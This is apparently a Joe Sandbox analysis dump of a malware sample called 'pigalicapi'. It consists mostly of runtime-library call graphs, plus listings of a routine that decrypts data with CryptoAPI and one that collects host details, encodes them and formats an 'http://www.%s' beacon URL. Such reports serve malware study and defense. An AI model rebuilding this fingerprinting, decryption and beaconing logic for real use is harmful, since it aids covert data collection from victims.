11027->11028 11035 120aef5 EnterCriticalSection 11028->11035 11030 120991a 11036 1209c2b 11030->11036 11032 1209932 11040 1209948 11032->11040 11034 1209940 ___scrt_is_nonwritable_in_current_image 11034->11015 11035->11030 11037 1209c3a __fassign 11036->11037 11039 1209c61 __fassign 11036->11039 11037->11039 11043 120aba0 11037->11043 11039->11032 11153 120af3d LeaveCriticalSection 11040->11153 11042 1209952 11042->11034 11044 120ac20 11043->11044 11047 120abb6 11043->11047 11046 120a64e _free 20 API calls 11044->11046 11069 120ac6e 11044->11069 11048 120ac42 11046->11048 11047->11044 11051 120a64e _free 20 API calls 11047->11051 11053 120abe9 11047->11053 11049 120a64e _free 20 API calls 11048->11049 11052 120ac55 11049->11052 11050 120ac7c 11059 120acdc 11050->11059 11068 120a64e 20 API calls _free 11050->11068 11055 120abde 11051->11055 11056 120a64e _free 20 API calls 11052->11056 11057 120a64e _free 20 API calls 11053->11057 11070 120ac0b 11053->11070 11054 120a64e _free 20 API calls 11058 120ac15 11054->11058 11071 120c250 11055->11071 11062 120ac63 11056->11062 11063 120ac00 11057->11063 11064 120a64e _free 20 API calls 11058->11064 11060 120a64e _free 20 API calls 11059->11060 11065 120ace2 11060->11065 11066 120a64e _free 20 API calls 11062->11066 11099 120c34e 11063->11099 11064->11044 11065->11039 11066->11069 11068->11050 11111 120ad13 11069->11111 11070->11054 11072 120c261 11071->11072 11098 120c34a 11071->11098 11073 120c272 11072->11073 11074 120a64e _free 20 API calls 11072->11074 11075 120c284 11073->11075 11076 120a64e _free 20 API calls 11073->11076 11074->11073 11077 120c296 11075->11077 11078 120a64e _free 20 API calls 11075->11078 11076->11075 11079 120c2a8 11077->11079 11080 120a64e _free 20 API calls 11077->11080 11078->11077 11081 120c2ba 11079->11081 11082 120a64e _free 20 API calls 11079->11082 11080->11079 11083 120c2cc 11081->11083 11084 120a64e _free 20 API calls 11081->11084 11082->11081 11085 120c2de 11083->11085 11086 120a64e _free 20 API calls 11083->11086 11084->11083 11087 120c2f0 11085->11087 11088 120a64e _free 20 API calls 11085->11088 11086->11085 11089 120c302 11087->11089 11090 120a64e _free 20 API calls 11087->11090 11088->11087 11091 120c314 11089->11091 11092 120a64e _free 20 API calls 11089->11092 11090->11089 11093 120c326 11091->11093 11094 120a64e _free 20 API calls 11091->11094 11092->11091 11095 120a64e _free 20 API calls 11093->11095 11096 120c338 11093->11096 11094->11093 11095->11096 11097 120a64e _free 20 API calls 11096->11097 11096->11098 11097->11098 11098->11053 11100 120c3b3 11099->11100 11101 120c35b 11099->11101 11100->11070 11102 120c36b 11101->11102 11103 120a64e _free 20 API calls 11101->11103 11104 120c37d 11102->11104 11105 120a64e _free 20 API calls 11102->11105 11103->11102 11106 120c38f 11104->11106 11108 120a64e _free 20 API calls 11104->11108 11105->11104 11107 120c3a1 11106->11107 11109 120a64e _free 20 API calls 11106->11109 11107->11100 11110 120a64e _free 20 API calls 11107->11110 11108->11106 11109->11107 11110->11100 11112 120ad20 11111->11112 11116 120ad3e 11111->11116 11112->11116 11117 120c3f3 11112->11117 11115 120a64e _free 20 API calls 11115->11116 11116->11050 11118 120ad38 11117->11118 11119 120c404 11117->11119 11118->11115 11120 120c3b7 __fassign 20 API calls 11119->11120 11121 120c40c 11120->11121 11122 120c3b7 __fassign 20 API calls 11121->11122 11123 120c417 11122->11123 11124 120c3b7 __fassign 20 API calls 11123->11124 11125 120c422 11124->11125 11126 120c3b7 __fassign 20 API calls 11125->11126 11127 120c42d 11126->11127 11128 120c3b7 __fassign 20 API calls 11127->11128 11129 120c43b 11128->11129 11130 120a64e _free 20 API calls 11129->11130 11131 120c446 11130->11131 11132 120a64e _free 20 API calls 11131->11132 11133 120c451 11132->11133 11134 120a64e _free 20 API calls 11133->11134 11135 120c45c 11134->11135 11136 120c3b7 __fassign 20 API calls 11135->11136 11137 120c46a 11136->11137 11138 120c3b7 __fassign 20 API calls 11137->11138 11139 120c478 11138->11139 11140 120c3b7 __fassign 20 API calls 11139->11140 11141 120c489 11140->11141 11142 120c3b7 __fassign 20 API calls 11141->11142 11143 120c497 11142->11143 11144 120c3b7 __fassign 20 API calls 11143->11144 11145 120c4a5 11144->11145 11146 120a64e _free 20 API calls 11145->11146 11147 120c4b0 11146->11147 11148 120a64e _free 20 API calls 11147->11148 11149 120c4bb 11148->11149 11150 120a64e _free 20 API calls 11149->11150 11151 120c4c6 11150->11151 11152 120a64e _free 20 API calls 11151->11152 11152->11118 11153->11042 13465 5d2f60 13468 5d3090 GetPEB 13465->13468 13467 5d2f72 13468->13467 12866 1209b61 12867 1209b6c 12866->12867 12868 1209b7c 12866->12868 12872 1209b82 12867->12872 12871 120a64e _free 20 API calls 12871->12868 12873 1209b95 12872->12873 12874 1209b9b 12872->12874 12875 120a64e _free 20 API calls 12873->12875 12876 120a64e _free 20 API calls 12874->12876 12875->12874 12877 1209ba7 12876->12877 12878 120a64e _free 20 API calls 12877->12878 12879 1209bb2 12878->12879 12880 120a64e _free 20 API calls 12879->12880 12881 1209bbd 12880->12881 12882 120a64e _free 20 API calls 12881->12882 12883 1209bc8 12882->12883 12884 120a64e _free 20 API calls 12883->12884 12885 1209bd3 12884->12885 12886 120a64e _free 20 API calls 12885->12886 12887 1209bde 12886->12887 12888 120a64e _free 20 API calls 12887->12888 12889 1209be9 12888->12889 12890 120a64e _free 20 API calls 12889->12890 12891 1209bf4 12890->12891 12892 120a64e _free 20 API calls 12891->12892 12893 1209c02 12892->12893 12898 1209a48 12893->12898 12904 1209954 12898->12904 12900 1209a6c 12901 1209a98 12900->12901 12917 12099b5 12901->12917 12903 1209abc 12903->12871 12905 1209960 ___scrt_is_nonwritable_in_current_image 12904->12905 12912 120aef5 EnterCriticalSection 12905->12912 12908 120996a 12910 120a64e _free 20 API calls 12908->12910 12911 1209994 12908->12911 12909 12099a1 ___scrt_is_nonwritable_in_current_image 12909->12900 12910->12911 12913 12099a9 12911->12913 12912->12908 12916 120af3d LeaveCriticalSection 12913->12916 12915 12099b3 12915->12909 12916->12915 12918 12099c1 ___scrt_is_nonwritable_in_current_image 12917->12918 12925 120aef5 EnterCriticalSection 12918->12925 12920 12099cb 12921 1209c2b __dosmaperr 20 API calls 12920->12921 12922 12099de 12921->12922 12926 12099f4 12922->12926 12924 12099ec ___scrt_is_nonwritable_in_current_image 12924->12903 12925->12920 12929 120af3d LeaveCriticalSection 12926->12929 12928 12099fe 12928->12924 12929->12928 14070 120c8e4 14071 120c8f0 ___scrt_is_nonwritable_in_current_image 14070->14071 14074 120c927 ___scrt_is_nonwritable_in_current_image 14071->14074 14078 120aef5 EnterCriticalSection 14071->14078 14073 120c904 14075 120ae64 __fassign 20 API calls 14073->14075 14076 120c914 14075->14076 14079 120c92d 14076->14079 14078->14073 14082 120af3d LeaveCriticalSection 14079->14082 14081 120c934 14081->14074 14082->14081 13159 120d1e5 13160 120d1ed pre_c_initialization 13159->13160 13177 120f353 13160->13177 13162 120d1f8 pre_c_initialization 13182 120db56 13162->13182 13164 120d281 13165 120d5ca ___scrt_fastfail 4 API calls 13164->13165 13167 120d288 ___scrt_initialize_default_local_stdio_options 13165->13167 13166 120d20d __RTC_Initialize 13166->13164 13187 120dcf7 13166->13187 13169 120d226 pre_c_initialization 13169->13164 13170 120d237 13169->13170 13190 120ddb5 InitializeSListHead 13170->13190 13172 120d23c pre_c_initialization __except_handler4 13191 120ddc4 13172->13191 13174 120d25f pre_c_initialization 13197 120c936 13174->13197 13176 120d26a pre_c_initialization 13178 120f362 13177->13178 13179 120f385 13177->13179 13178->13179 13180 120951c __dosmaperr 20 API calls 13178->13180 13179->13162 13181 120f375 _abort 13180->13181 13181->13162 13183 120db64 13182->13183 13186 120db69 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 13182->13186 13184 120d5ca ___scrt_fastfail 4 API calls 13183->13184 13183->13186 13185 120dbec 13184->13185 13186->13166 13202 120dcbc 13187->13202 13190->13172 13240 120f4ab 13191->13240 13193 120ddd5 13194 120dddc 13193->13194 13195 120d5ca ___scrt_fastfail 4 API calls 13193->13195 13194->13174 13196 120dde4 13195->13196 13198 1209c76 _abort 35 API calls 13197->13198 13199 120c941 13198->13199 13200 120951c __dosmaperr 20 API calls 13199->13200 13201 120c96e _abort 13199->13201 13200->13201 13201->13176 13203 120dce0 13202->13203 13204 120dcd9 13202->13204 13211 120ce9b 13203->13211 13208 120ce2b 13204->13208 13207 120dcde 13207->13169 13209 120ce9b __onexit 23 API calls 13208->13209 13210 120ce3d 13209->13210 13210->13207 13214 120cb83 13211->13214 13217 120cab9 13214->13217 13216 120cba7 13216->13207 13218 120cac5 ___scrt_is_nonwritable_in_current_image 13217->13218 13225 120aef5 EnterCriticalSection 13218->13225 13220 120cad3 13226 120ccea 13220->13226 13222 120cae0 13236 120cafe 13222->13236 13224 120caf1 ___scrt_is_nonwritable_in_current_image 13224->13216 13225->13220 13227 120cd00 try_get_function 13226->13227 13228 120cd08 13226->13228 13227->13222 13228->13227 13229 120cd61 13228->13229 13230 120d098 __onexit 23 API calls 13228->13230 13229->13227 13231 120d098 __onexit 23 API calls 13229->13231 13232 120cd57 13230->13232 13233 120cd77 13231->13233 13234 120a64e _free 20 API calls 13232->13234 13235 120a64e _free 20 API calls 13233->13235 13234->13229 13235->13227 13239 120af3d LeaveCriticalSection 13236->13239 13238 120cb08 13238->13224 13239->13238 13241 120f4c9 pre_c_initialization 13240->13241 13243 120f4df pre_c_initialization _abort 13240->13243 13242 120951c __dosmaperr 20 API calls 13241->13242 13242->13243 13243->13193 13283 5d4880 13284 5d488f 13283->13284 13285 5d4a9f CryptReleaseContext 13284->13285 13287 5d48be CryptCreateHash 13284->13287 13286 5d4aab 13285->13286 13288 5d48f9 CryptHashData 13287->13288 13289 5d4a90 13287->13289 13290 5d4919 CryptDeriveKey 13288->13290 13291 5d4a83 CryptDestroyHash 13288->13291 13289->13285 13290->13291 13292 5d494a CryptDecrypt CryptDestroyKey 13290->13292 13291->13289 13292->13291 13293 5d4995 CryptCreateHash 13292->13293 13293->13291 13294 5d49b7 CryptHashData 13293->13294 13295 5d49da CryptGetHashParam 13294->13295 13296 5d4a76 CryptDestroyHash 13294->13296 13295->13296 13297 5d4a11 CryptGetHashParam 13295->13297 13296->13291 13297->13296 13298 5d4a3e 13297->13298 13298->13296 14104 120c4d7 14107 120b4b1 14104->14107 14108 120b4ba 14107->14108 14110 120b4c3 14107->14110 14109 120b3b0 49 API calls 14108->14109 14109->14110 13617 121065d 13627 1210ca3 13617->13627 13621 121066a 13640 1210e24 13621->13640 13624 1210694 13625 120a64e _free 20 API calls 13624->13625 13626 121069f 13625->13626 13644 1210cac 13627->13644 13629 1210665 13630 1210d84 13629->13630 13631 1210d90 ___scrt_is_nonwritable_in_current_image 13630->13631 13664 120aef5 EnterCriticalSection 13631->13664 13633 1210e06 13676 1210e1b 13633->13676 13635 1210dda DeleteCriticalSection 13638 120a64e _free 20 API calls 13635->13638 13636 1210e12 ___scrt_is_nonwritable_in_current_image 13636->13621 13639 1210d9b 13638->13639 13639->13633 13639->13635 13665 1211b9c 13639->13665 13641 1210e3a 13640->13641 13643 1210679 DeleteCriticalSection 13640->13643 13642 120a64e _free 20 API calls 13641->13642 13641->13643 13642->13643 13643->13621 13643->13624 13645 1210cb8 ___scrt_is_nonwritable_in_current_image 13644->13645 13654 120aef5 EnterCriticalSection 13645->13654 13647 1210d5b 13659 1210d7b 13647->13659 13651 1210d67 ___scrt_is_nonwritable_in_current_image 13651->13629 13652 1210c5c 63 API calls 13653 1210cc7 13652->13653 13653->13647 13653->13652 13655 12106a9 EnterCriticalSection 13653->13655 13656 1210d51 13653->13656 13654->13653 13655->13653 13662 12106bd LeaveCriticalSection 13656->13662 13658 1210d59 13658->13653 13663 120af3d LeaveCriticalSection 13659->13663 13661 1210d82 13661->13651 13662->13658 13663->13661 13664->13639 13666 1211ba8 ___scrt_is_nonwritable_in_current_image 13665->13666 13667 1211bb9 13666->13667 13668 1211bce 13666->13668 13669 120951c __dosmaperr 20 API calls 13667->13669 13673 1211bbe ___scrt_is_nonwritable_in_current_image _abort 13668->13673 13679 12106a9 EnterCriticalSection 13668->13679 13669->13673 13671 1211bea 13680 1211b26 13671->13680 13673->13639 13674 1211bf5 13694 1211c12 13674->13694 13928 120af3d LeaveCriticalSection 13676->13928 13678 1210e22 13678->13636 13679->13671 13681 1211b33 13680->13681 13682 1211b48 13680->13682 13683 120951c __dosmaperr 20 API calls 13681->13683 13685 1211b38 _abort 13682->13685 13697 1210bf6 13682->13697 13683->13685 13685->13674 13687 1210e24 20 API calls 13688 1211b64 13687->13688 13703 121056f 13688->13703 13690 1211b6a 13708 121202a 13690->13708 13692 1211b70 13692->13685 13693 120a64e _free 20 API calls 13692->13693 13693->13685 13927 12106bd LeaveCriticalSection 13694->13927 13696 1211c1a 13696->13673 13698 1210c0a 13697->13698 13699 1210c0e 13697->13699 13698->13687 13699->13698 13700 121056f 20 API calls 13699->13700 13701 1210c2e 13700->13701 13721 1211521 13701->13721 13704 1210590 13703->13704 13705 121057b 13703->13705 13704->13690 13706 120951c __dosmaperr 20 API calls 13705->13706 13707 1210580 _abort 13706->13707 13707->13690 13709 1212039 13708->13709 13710 121204e 13708->13710 13711 1209509 __dosmaperr 20 API calls 13709->13711 13712 1212089 13710->13712 13717 1212075 13710->13717 13713 121203e 13711->13713 13714 1209509 __dosmaperr 20 API calls 13712->13714 13716 120951c __dosmaperr 20 API calls 13713->13716 13715 121208e 13714->13715 13718 120951c __dosmaperr 20 API calls 13715->13718 13720 1212046 _abort 13716->13720 13884 1212002 13717->13884 13718->13720 13720->13692 13722 121152d ___scrt_is_nonwritable_in_current_image 13721->13722 13723 1211535 13722->13723 13724 121154d 13722->13724 13744 1209509 13723->13744 13725 12115eb 13724->13725 13729 1211582 13724->13729 13727 1209509 __dosmaperr 20 API calls 13725->13727 13730 12115f0 13727->13730 13747 120fc16 EnterCriticalSection 13729->13747 13733 120951c __dosmaperr 20 API calls 13730->13733 13731 120951c __dosmaperr 20 API calls 13740 1211542 ___scrt_is_nonwritable_in_current_image _abort 13731->13740 13733->13740 13734 1211588 13735 12115a4 13734->13735 13736 12115b9 13734->13736 13737 120951c __dosmaperr 20 API calls 13735->13737 13748 121160c 13736->13748 13739 12115a9 13737->13739 13742 1209509 __dosmaperr 20 API calls 13739->13742 13740->13698 13741 12115b4 13795 12115e3 13741->13795 13742->13741 13745 1209cfa __dosmaperr 20 API calls 13744->13745 13746 120950e 13745->13746 13746->13731 13747->13734 13749 121163a 13748->13749 13780 1211633 _abort 13748->13780 13750 121165d 13749->13750 13751 121163e 13749->13751 13755 12116ae 13750->13755 13756 1211691 13750->13756 13752 1209509 __dosmaperr 20 API calls 13751->13752 13754 1211643 13752->13754 13753 120d415 _ValidateLocalCookies 5 API calls 13757 1211814 13753->13757 13758 120951c __dosmaperr 20 API calls 13754->13758 13759 12116c4 13755->13759 13798 1211b0b 13755->13798 13760 1209509 __dosmaperr 20 API calls 13756->13760 13757->13741 13758->13780 13801 12111b1 13759->13801 13763 1211696 13760->13763 13765 120951c __dosmaperr 20 API calls 13763->13765 13765->13780 13766 12116d2 13770 12116d6 13766->13770 13771 12116f8 13766->13771 13767 121170b 13768 1211765 WriteFile 13767->13768 13769 121171f 13767->13769 13772 1211788 GetLastError 13768->13772 13783 12116ee 13768->13783 13774 1211755 13769->13774 13775 1211727 13769->13775 13786 12117cc 13770->13786 13808 1211144 13770->13808 13813 1210f91 GetConsoleCP 13771->13813 13772->13783 13839 1211227 13774->13839 13776 1211745 13775->13776 13777 121172c 13775->13777 13831 12113f4 13776->13831 13777->13786 13824 1211306 13777->13824 13780->13753 13781 120951c __dosmaperr 20 API calls 13784 12117f1 13781->13784 13783->13780 13785 12117a8 13783->13785 13783->13786 13788 1209509 __dosmaperr 20 API calls 13784->13788 13789 12117c3 13785->13789 13790 12117af 13785->13790 13786->13780 13786->13781 13788->13780 13846 12094e6 13789->13846 13791 120951c __dosmaperr 20 API calls 13790->13791 13793 12117b4 13791->13793 13794 1209509 __dosmaperr 20 API calls 13793->13794 13794->13780 13883 120fc39 LeaveCriticalSection 13795->13883 13797 12115e9 13797->13740 13851 1211a8d 13798->13851 13871 1210ba0 13801->13871 13803 12111c1 13804 12111c6 13803->13804 13805 1209c76 _abort 35 API calls 13803->13805 13804->13766 13804->13767 13806 12111e9 13805->13806 13806->13804 13807 1211207 GetConsoleMode 13806->13807 13807->13804 13809 121119e 13808->13809 13812 1211169 13808->13812 13809->13783 13810 1211c81 WriteConsoleW CreateFileW 13810->13812 13811 12111a0 GetLastError 13811->13809 13812->13809 13812->13810 13812->13811 13817 1211106 13813->13817 13823 1210ff4 13813->13823 13814 120d415 _ValidateLocalCookies 5 API calls 13816 1211140 13814->13816 13816->13783 13817->13814 13818 121107a WideCharToMultiByte 13818->13817 13820 12110a0 WriteFile 13818->13820 13819 1210555 37 API calls __fassign 13819->13823 13821 1211129 GetLastError 13820->13821 13820->13823 13821->13817 13822 12110d1 WriteFile 13822->13821 13822->13823 13823->13817 13823->13818 13823->13819 13823->13822 13878 120c9f2 13823->13878 13828 1211315 13824->13828 13825 12113d7 13827 120d415 _ValidateLocalCookies 5 API calls 13825->13827 13826 1211393 WriteFile 13826->13828 13829 12113d9 GetLastError 13826->13829 13830 12113f0 13827->13830 13828->13825 13828->13826 13829->13825 13830->13783 13833 1211403 13831->13833 13832 121150e 13834 120d415 _ValidateLocalCookies 5 API calls 13832->13834 13833->13832 13835 1211485 WideCharToMultiByte 13833->13835 13838 12114ba WriteFile 13833->13838 13836 121151d 13834->13836 13837 1211506 GetLastError 13835->13837 13835->13838 13836->13783 13837->13832 13838->13833 13838->13837 13844 1211236 13839->13844 13840 12112e9 13841 120d415 _ValidateLocalCookies 5 API calls 13840->13841 13843 1211302 13841->13843 13842 12112a8 WriteFile 13842->13844 13845 12112eb GetLastError 13842->13845 13843->13783 13844->13840 13844->13842 13845->13840 13847 1209509 __dosmaperr 20 API calls 13846->13847 13848 12094f1 __dosmaperr 13847->13848 13849 120951c __dosmaperr 20 API calls 13848->13849 13850 1209504 13849->13850 13850->13780 13860 120fced 13851->13860 13853 1211a9f 13854 1211aa7 13853->13854 13855 1211ab8 SetFilePointerEx 13853->13855 13858 120951c __dosmaperr 20 API calls 13854->13858 13856 1211ad0 GetLastError 13855->13856 13857 1211aac 13855->13857 13859 12094e6 __dosmaperr 20 API calls 13856->13859 13857->13759 13858->13857 13859->13857 13861 120fcfa 13860->13861 13862 120fd0f 13860->13862 13863 1209509 __dosmaperr 20 API calls 13861->13863 13865 1209509 __dosmaperr 20 API calls 13862->13865 13867 120fd34 13862->13867 13864 120fcff 13863->13864 13866 120951c __dosmaperr 20 API calls 13864->13866 13868 120fd3f 13865->13868 13870 120fd07 _abort 13866->13870 13867->13853 13869 120951c __dosmaperr 20 API calls 13868->13869 13869->13870 13870->13853 13872 1210bba 13871->13872 13873 1210bad 13871->13873 13875 1210bc6 13872->13875 13876 120951c __dosmaperr 20 API calls 13872->13876 13874 120951c __dosmaperr 20 API calls 13873->13874 13877 1210bb2 _abort 13874->13877 13875->13803 13876->13877 13877->13803 13879 1209c76 _abort 35 API calls 13878->13879 13880 120c9fd 13879->13880 13881 120c998 __fassign 35 API calls 13880->13881 13882 120ca0d 13881->13882 13882->13823 13883->13797 13887 1211f80 13884->13887 13886 1212026 13886->13720 13888 1211f8c ___scrt_is_nonwritable_in_current_image 13887->13888 13898 120fc16 EnterCriticalSection 13888->13898 13890 1211f9a 13891 1211fc1 13890->13891 13892 1211fcc 13890->13892 13899 12120a9 13891->13899 13894 120951c __dosmaperr 20 API calls 13892->13894 13895 1211fc7 13894->13895 13914 1211ff6 13895->13914 13897 1211fe9 ___scrt_is_nonwritable_in_current_image 13897->13886 13898->13890 13900 120fced 20 API calls 13899->13900 13903 12120b9 13900->13903 13901 12120bf 13917 120fc5c 13901->13917 13903->13901 13904 12120f1 13903->13904 13907 120fced 20 API calls 13903->13907 13904->13901 13905 120fced 20 API calls 13904->13905 13908 12120fd CloseHandle 13905->13908 13909 12120e8 13907->13909 13908->13901 13910 1212109 GetLastError 13908->13910 13912 120fced 20 API calls 13909->13912 13910->13901 13911 12094e6 __dosmaperr 20 API calls 13913 1212139 13911->13913 13912->13904 13913->13895 13926 120fc39 LeaveCriticalSection 13914->13926 13916 1212000 13916->13897 13918 120fcd2 13917->13918 13920 120fc6b 13917->13920 13919 120951c __dosmaperr 20 API calls 13918->13919 13921 120fcd7 13919->13921 13920->13918 13925 120fc95 13920->13925 13922 1209509 __dosmaperr 20 API calls 13921->13922 13923 120fcc2 13922->13923 13923->13911 13923->13913 13924 120fcbc SetStdHandle 13924->13923 13925->13923 13925->13924 13926->13916 13927->13696 13928->13678 12639 120f0df 12648 120fa7f GetEnvironmentStringsW 12639->12648 12643 120a64e _free 20 API calls 12644 120f12c 12643->12644 12645 120f102 12646 120a64e _free 20 API calls 12645->12646 12647 120f0f7 12646->12647 12647->12643 12649 120fa93 12648->12649 12650 120f0f1 12648->12650 12651 120c4e6 __onexit 21 API calls 12649->12651 12650->12647 12655 120f132 12650->12655 12653 120faa7 12651->12653 12652 120a64e _free 20 API calls 12654 120fac1 FreeEnvironmentStringsW 12652->12654 12653->12652 12654->12650 12656 120f150 12655->12656 12657 120a5f1 __dosmaperr 20 API calls 12656->12657 12666 120f18a 12657->12666 12658 120f1fb 12659 120a64e _free 20 API calls 12658->12659 12660 120f215 12659->12660 12660->12645 12661 120a5f1 __dosmaperr 20 API calls 12661->12666 12662 120f1fd 12679 120f22c 12662->12679 12666->12658 12666->12661 12666->12662 12667 120f21f 12666->12667 12670 120a64e _free 20 API calls 12666->12670 12672 120cefb 12666->12672 12685 12098d1 IsProcessorFeaturePresent 12667->12685 12668 120a64e _free 20 API calls 12668->12658 12670->12666 12671 120f22b 12673 120cf08 12672->12673 12674 120cf16 12672->12674 12673->12674 12676 120cf2f 12673->12676 12675 120951c __dosmaperr 20 API calls 12674->12675 12678 120cf20 _abort 12675->12678 12677 120951c __dosmaperr 20 API calls 12676->12677 12676->12678 12677->12678 12678->12666 12680 120f203 12679->12680 12681 120f239 12679->12681 12680->12668 12682 120f250 12681->12682 12683 120a64e _free 20 API calls 12681->12683 12684 120a64e _free 20 API calls 12682->12684 12683->12681 12684->12680 12686 12098dc 12685->12686 12687 12096f7 _abort 8 API calls 12686->12687 12688 12098f1 GetCurrentProcess TerminateProcess 12687->12688 12688->12671

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 5d4ba0-5d4bbc CoInitialize 1 5d56f0-5d56fc CoUninitialize 0->1 2 5d4bc2-5d4bff call 5d7b70 SetEvent 0->2 2->1 6 5d4c05-5d4c0e 2->6 7 5d4c28-5d4c84 VirtualAlloc * 3 6->7 8 5d4c10-5d4c21 WaitForSingleObject 6->8 9 5d56eb 7->9 10 5d4c8a-5d4c8e 7->10 8->7 11 5d4c23 8->11 9->1 10->9 12 5d4c94-5d4c98 10->12 11->1 12->9 13 5d4c9e-5d4cbd 12->13 15 5d4cc3-5d4cd0 13->15 16 5d52a2-5d52b2 13->16 19 5d529d 15->19 20 5d4cd6-5d4ce3 15->20 17 5d5325-5d534e call 5d8370 16->17 18 5d52b4-5d52be 16->18 35 5d56b8-5d56e5 VirtualFree * 3 17->35 36 5d5354-5d537f lstrlenA * 2 17->36 18->17 21 5d52c0-5d52d1 18->21 22 5d4d1c-5d4d29 20->22 23 5d4ce5-5d4d17 call 5d6170 * 2 call 5d60c0 20->23 21->17 27 5d52d3-5d52dd 21->27 25 5d4d2b-5d4d5d call 5d6170 * 2 call 5d60c0 22->25 26 5d4d62-5d4d6f 22->26 23->19 25->19 32 5d4da8-5d4db5 26->32 33 5d4d71-5d4da3 call 5d6170 * 2 call 5d60c0 26->33 27->17 31 5d52df-5d5322 call 5d7b70 27->31 31->17 38 5d4e2c-5d4e39 32->38 39 5d4db7-5d4dd8 GetCurrentThreadId call 5d6170 32->39 33->19 35->9 36->35 37 5d5385-5d53ca wsprintfA CryptBinaryToStringA 36->37 37->35 44 5d53d0-5d544e MultiByteToWideChar call 5d17d0 37->44 45 5d4e3b-5d4e6d call 5d6170 * 2 call 5d60c0 38->45 46 5d4e72-5d4e7f 38->46 65 5d4dfd-5d4e04 39->65 66 5d4dda-5d4dfb call 5d6170 call 5d60c0 39->66 71 5d569b-5d56a2 44->71 72 5d5454-5d545e 44->72 45->19 57 5d4ee1-5d4eee 46->57 58 5d4e81-5d4eb4 GetSystemMetrics * 2 call 5d6170 46->58 62 5d4f40-5d4f4d 57->62 63 5d4ef0-5d4f13 GlobalMemoryStatus call 5d6170 57->63 81 5d4eb9-5d4edc call 5d6170 call 5d60c0 58->81 77 5d4f4f-5d4f81 call 5d6170 * 2 call 5d60c0 62->77 78 5d4f86-5d4f93 62->78 88 5d4f18-5d4f3b call 5d6170 call 5d60c0 63->88 79 5d4e27 65->79 80 5d4e06-5d4e24 call 5d6170 call 5d60c0 65->80 66->79 71->35 85 5d56a4-5d56b2 VirtualFree 71->85 86 5d5470-5d5477 72->86 87 5d5460-5d546a 72->87 77->19 83 5d4f95-5d4fcb call 5d6170 * 2 call 5d60c0 78->83 84 5d4fd0-5d4fdd 78->84 79->19 80->79 81->19 83->19 100 5d4fdf-5d502d lstrlenA call 5d6170 * 2 call 5d60c0 84->100 101 5d5032-5d503f 84->101 85->35 95 5d551f-5d5526 86->95 97 5d547d-5d54af VirtualFree 86->97 87->86 87->95 88->19 95->71 106 5d552c-5d5540 EnterCriticalSection 95->106 111 5d54c0-5d54c7 97->111 100->19 107 5d5096-5d50a3 101->107 108 5d5041-5d5091 lstrlenA call 5d6170 * 2 call 5d60c0 101->108 119 5d558c-5d55c1 VirtualAlloc 106->119 120 5d5542-5d5573 VirtualAlloc call 5d7b70 106->120 125 5d50a5-5d50ff lstrlenA call 5d6170 * 2 call 5d60c0 107->125 126 5d5104-5d5111 107->126 108->19 111->95 124 5d54c9-5d54f5 call 5d17d0 111->124 134 5d568e-5d5695 LeaveCriticalSection 119->134 135 5d55c7-5d55d8 GetTickCount 119->135 142 5d5578-5d5587 120->142 150 5d54fa-5d550d 124->150 125->19 131 5d5113-5d516d lstrlenA call 5d6170 * 2 call 5d60c0 126->131 132 5d5172-5d517f 126->132 131->19 148 5d5181-5d51db lstrlenA call 5d6170 * 2 call 5d60c0 132->148 149 5d51e0-5d51ed 132->149 134->71 145 5d561c-5d5659 call 5d7b70 * 2 135->145 146 5d55da-5d561a call 5d7b70 * 2 135->146 142->134 192 5d565c-5d568b VirtualFree 145->192 146->192 148->19 154 5d523f-5d524c 149->154 155 5d51ef-5d523d lstrlenA call 5d6170 * 2 call 5d60c0 149->155 162 5d550f-5d5519 150->162 163 5d551b 150->163 154->19 170 5d524e-5d529a call 5d9b90 call 5d6170 * 2 call 5d60c0 154->170 155->19 162->163 173 5d551d 162->173 163->95 170->19 173->111 192->134
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 005D4BAC
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 005D4BDB
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 005D4C19
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C49
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C60
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C77
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 005D56F0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                • API String ID: 1834614700-967124566
                                                                                                                                                                                • Opcode ID: b57c75c947cefb11674c7835aa722e5fc24c0d054a69e2c22ac42f85ed0e246f
                                                                                                                                                                                • Instruction ID: a9fe04ae576f3d26eba94001428491539cbdd02aab71691a888ba36892ebf568
                                                                                                                                                                                • Opcode Fuzzy Hash: b57c75c947cefb11674c7835aa722e5fc24c0d054a69e2c22ac42f85ed0e246f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5062BFB5D00218EBDB24DB98DC89FADBB74BF58305F04854BF605A6382E7709A89CB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
